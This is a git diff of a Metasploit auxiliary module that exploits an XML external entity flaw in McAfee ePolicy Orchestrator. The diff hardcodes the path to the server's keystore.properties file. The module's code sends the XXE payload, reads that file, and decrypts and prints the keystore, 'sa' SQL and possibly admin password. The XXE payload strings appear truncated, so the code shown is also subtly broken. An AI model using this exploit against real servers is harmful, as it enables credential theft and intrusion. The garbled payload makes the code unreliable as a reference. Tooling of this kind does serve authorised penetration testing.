diff --git a/modules/auxiliary/gather/mcafee_epo_xxe.rb b/modules/auxiliary/gather/mcafee_epo_xxe.rb index 02974573f1..aa93f21ac0 100644 --- a/modules/auxiliary/gather/mcafee_epo_xxe.rb +++ b/modules/auxiliary/gather/mcafee_epo_xxe.rb @@ -50,7 +50,6 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(8443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [ true, "Base ePO directory path", '/']), - OptString.new('FILEPATH', [true, "The filepath to read on the server", "C:/Program Files (x86)/McAfee/ePolicy Orchestrator/Server/conf/orion/keystore.properties"]), OptString.new('USERNAME', [true, "The username to authenticate with", "username"]), OptString.new('PASSWORD', [true, "The password to authenticate with", "password"]) ], self.class) @@ -205,7 +204,8 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending payload...") - xxe = ']>OrionTaskLogTaskMessage.Messageeq&xxe;' + filepath = "C:/Program Files (x86)/McAfee/ePolicy Orchestrator/Server/conf/orion/keystore.properties" + xxe = ']>OrionTaskLogTaskMessage.Messageeq&xxe;' res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'core', 'orionUpdateTableFilter.do'), @@ -255,7 +255,6 @@ class Metasploit3 < Msf::Auxiliary passphrase = aes.update(Rex::Text.decode_base64(passphrase)) + aes.final print_good("The decrypted password for the keystore, 'sa' SQL user (if using local instance), and possibly 'admin' is: " + passphrase) - end end